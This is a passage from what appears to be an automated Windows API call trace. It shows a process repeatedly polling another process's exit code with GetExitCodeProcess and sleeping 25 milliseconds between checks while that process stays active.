lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.400] Sleep (dwMilliseconds=0x19) [0267.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.457] Sleep (dwMilliseconds=0x19) [0267.492] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.492] Sleep (dwMilliseconds=0x19) [0267.528] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.528] Sleep (dwMilliseconds=0x19) [0267.571] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.572] Sleep (dwMilliseconds=0x19) [0267.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.685] Sleep (dwMilliseconds=0x19) [0267.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.726] Sleep (dwMilliseconds=0x19) [0267.763] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.763] Sleep (dwMilliseconds=0x19) [0267.856] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.856] Sleep (dwMilliseconds=0x19) [0267.890] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.891] Sleep (dwMilliseconds=0x19) [0267.931] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.931] Sleep (dwMilliseconds=0x19) [0267.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.969] Sleep (dwMilliseconds=0x19) [0268.004] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.004] Sleep (dwMilliseconds=0x19) [0268.040] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.041] Sleep (dwMilliseconds=0x19) [0268.075] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.075] Sleep (dwMilliseconds=0x19) [0268.134] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.134] Sleep (dwMilliseconds=0x19) [0268.169] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.169] Sleep (dwMilliseconds=0x19) [0268.215] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.215] Sleep (dwMilliseconds=0x19) [0268.259] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.259] Sleep (dwMilliseconds=0x19) [0268.298] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.298] Sleep (dwMilliseconds=0x19) [0268.332] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.332] Sleep (dwMilliseconds=0x19) [0268.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.367] Sleep (dwMilliseconds=0x19) [0268.401] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.401] Sleep (dwMilliseconds=0x19) [0268.443] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.443] Sleep (dwMilliseconds=0x19) [0268.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.477] Sleep (dwMilliseconds=0x19) [0268.512] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.512] Sleep (dwMilliseconds=0x19) [0268.547] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.547] Sleep (dwMilliseconds=0x19) [0268.583] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.583] Sleep (dwMilliseconds=0x19) [0268.673] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.673] Sleep (dwMilliseconds=0x19) [0268.708] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.708] Sleep (dwMilliseconds=0x19) [0268.777] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.777] Sleep (dwMilliseconds=0x19) [0268.821] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.821] Sleep (dwMilliseconds=0x19) [0268.861] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.861] Sleep (dwMilliseconds=0x19) [0268.898] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.899] Sleep (dwMilliseconds=0x19) [0268.933] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.933] Sleep (dwMilliseconds=0x19) [0268.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0268.973] Sleep (dwMilliseconds=0x19) [0269.021] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.021] Sleep (dwMilliseconds=0x19) [0269.055] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.055] Sleep (dwMilliseconds=0x19) [0269.095] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.095] Sleep (dwMilliseconds=0x19) [0269.130] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.130] Sleep (dwMilliseconds=0x19) [0269.199] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.200] Sleep (dwMilliseconds=0x19) [0269.245] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.245] Sleep (dwMilliseconds=0x19) [0269.279] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.279] Sleep (dwMilliseconds=0x19) [0269.356] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.356] Sleep (dwMilliseconds=0x19) [0269.394] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.395] Sleep (dwMilliseconds=0x19) [0269.429] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.429] Sleep (dwMilliseconds=0x19) [0269.504] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.504] Sleep (dwMilliseconds=0x19) [0269.543] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.543] Sleep (dwMilliseconds=0x19) [0269.577] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.577] Sleep (dwMilliseconds=0x19) [0269.651] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.651] Sleep (dwMilliseconds=0x19) [0269.733] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.733] Sleep (dwMilliseconds=0x19) [0269.897] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.898] Sleep (dwMilliseconds=0x19) [0269.968] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0269.968] Sleep (dwMilliseconds=0x19) [0270.122] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.122] Sleep (dwMilliseconds=0x19) [0270.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.171] Sleep (dwMilliseconds=0x19) [0270.208] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.208] Sleep (dwMilliseconds=0x19) [0270.243] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.243] Sleep (dwMilliseconds=0x19) [0270.283] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.283] Sleep (dwMilliseconds=0x19) [0270.361] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.361] Sleep (dwMilliseconds=0x19) [0270.435] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.435] Sleep (dwMilliseconds=0x19) [0270.494] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.494] Sleep (dwMilliseconds=0x19) [0270.529] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.529] Sleep (dwMilliseconds=0x19) [0270.564] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.564] Sleep (dwMilliseconds=0x19) [0270.644] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.645] Sleep (dwMilliseconds=0x19) [0270.718] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.718] Sleep (dwMilliseconds=0x19) [0270.776] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.776] Sleep (dwMilliseconds=0x19) [0270.811] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.811] Sleep (dwMilliseconds=0x19) [0270.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.859] Sleep (dwMilliseconds=0x19) [0270.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.900] Sleep (dwMilliseconds=0x19) [0270.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0270.937] Sleep (dwMilliseconds=0x19) [0271.008] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.008] Sleep (dwMilliseconds=0x19) [0271.051] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.051] Sleep (dwMilliseconds=0x19) [0271.092] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.092] Sleep (dwMilliseconds=0x19) [0271.127] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.127] Sleep (dwMilliseconds=0x19) [0271.189] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.189] Sleep (dwMilliseconds=0x19) [0271.236] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.236] Sleep (dwMilliseconds=0x19) [0271.281] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.281] Sleep (dwMilliseconds=0x19) [0271.338] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.338] Sleep (dwMilliseconds=0x19) [0271.372] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.372] Sleep (dwMilliseconds=0x19) [0271.407] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.407] Sleep (dwMilliseconds=0x19) [0271.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.441] Sleep (dwMilliseconds=0x19) [0271.482] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.483] Sleep (dwMilliseconds=0x19) [0271.590] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.623] Sleep (dwMilliseconds=0x19) [0271.658] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.658] Sleep (dwMilliseconds=0x19) [0271.733] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.733] Sleep (dwMilliseconds=0x19) [0271.768] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.768] Sleep (dwMilliseconds=0x19) [0271.802] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.802] Sleep (dwMilliseconds=0x19) [0271.837] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.837] Sleep (dwMilliseconds=0x19) [0271.910] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.910] Sleep (dwMilliseconds=0x19) [0271.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.945] Sleep (dwMilliseconds=0x19) [0271.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0271.980] Sleep (dwMilliseconds=0x19) [0272.014] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.014] Sleep (dwMilliseconds=0x19) [0272.050] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.050] Sleep (dwMilliseconds=0x19) [0272.097] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.097] Sleep (dwMilliseconds=0x19) [0272.132] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.132] Sleep (dwMilliseconds=0x19) [0272.167] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.167] Sleep (dwMilliseconds=0x19) [0272.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.206] Sleep (dwMilliseconds=0x19) [0272.247] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.247] Sleep (dwMilliseconds=0x19) [0272.307] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.307] Sleep (dwMilliseconds=0x19) [0272.351] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.351] Sleep (dwMilliseconds=0x19) [0272.386] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.386] Sleep (dwMilliseconds=0x19) [0272.422] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.422] Sleep (dwMilliseconds=0x19) [0272.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.457] Sleep (dwMilliseconds=0x19) [0272.518] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.518] Sleep (dwMilliseconds=0x19) [0272.552] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.552] Sleep (dwMilliseconds=0x19) [0272.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.633] Sleep (dwMilliseconds=0x19) [0272.688] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.688] Sleep (dwMilliseconds=0x19) [0272.723] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.723] Sleep (dwMilliseconds=0x19) [0272.760] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.760] Sleep (dwMilliseconds=0x19) [0272.804] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.804] Sleep (dwMilliseconds=0x19) [0272.892] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0272.892] Sleep (dwMilliseconds=0x19) [0273.045] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.045] Sleep (dwMilliseconds=0x19) [0273.123] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.123] Sleep (dwMilliseconds=0x19) [0273.232] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.232] Sleep (dwMilliseconds=0x19) [0273.296] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.296] Sleep (dwMilliseconds=0x19) [0273.332] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.332] Sleep (dwMilliseconds=0x19) [0273.367] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.368] Sleep (dwMilliseconds=0x19) [0273.413] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.413] Sleep (dwMilliseconds=0x19) [0273.454] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.454] Sleep (dwMilliseconds=0x19) [0273.504] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.504] Sleep (dwMilliseconds=0x19) [0273.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.540] Sleep (dwMilliseconds=0x19) [0273.574] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.574] Sleep (dwMilliseconds=0x19) [0273.694] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.694] Sleep (dwMilliseconds=0x19) [0273.793] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.793] Sleep (dwMilliseconds=0x19) [0273.841] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.841] Sleep (dwMilliseconds=0x19) [0273.933] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.933] Sleep (dwMilliseconds=0x19) [0273.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0273.973] Sleep (dwMilliseconds=0x19) [0274.070] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.071] Sleep (dwMilliseconds=0x19) [0274.176] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.176] Sleep (dwMilliseconds=0x19) [0274.220] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.220] Sleep (dwMilliseconds=0x19) [0274.265] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.265] Sleep (dwMilliseconds=0x19) [0274.302] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.302] Sleep (dwMilliseconds=0x19) [0274.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.339] Sleep (dwMilliseconds=0x19) [0274.375] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.375] Sleep (dwMilliseconds=0x19) [0274.495] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.495] Sleep (dwMilliseconds=0x19) [0274.632] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.632] Sleep (dwMilliseconds=0x19) [0274.821] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.821] Sleep (dwMilliseconds=0x19) [0274.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.908] Sleep (dwMilliseconds=0x19) [0274.953] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0274.953] Sleep (dwMilliseconds=0x19) [0275.017] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.017] Sleep (dwMilliseconds=0x19) [0275.060] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.061] Sleep (dwMilliseconds=0x19) [0275.106] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.106] Sleep (dwMilliseconds=0x19) [0275.139] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.139] Sleep (dwMilliseconds=0x19) [0275.191] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.191] Sleep (dwMilliseconds=0x19) [0275.239] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.240] Sleep (dwMilliseconds=0x19) [0275.274] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.274] Sleep (dwMilliseconds=0x19) [0275.309] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.309] Sleep (dwMilliseconds=0x19) [0275.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.378] Sleep (dwMilliseconds=0x19) [0275.429] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.429] Sleep (dwMilliseconds=0x19) [0275.463] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.463] Sleep (dwMilliseconds=0x19) [0275.497] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.497] Sleep (dwMilliseconds=0x19) [0275.551] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.551] Sleep (dwMilliseconds=0x19) [0275.585] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.585] Sleep (dwMilliseconds=0x19) [0275.620] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.620] Sleep (dwMilliseconds=0x19) [0275.658] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.658] Sleep (dwMilliseconds=0x19) [0275.693] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.693] Sleep (dwMilliseconds=0x19) [0275.767] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.767] Sleep (dwMilliseconds=0x19) [0275.805] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.805] Sleep (dwMilliseconds=0x19) [0275.839] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.839] Sleep (dwMilliseconds=0x19) [0275.890] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.890] Sleep 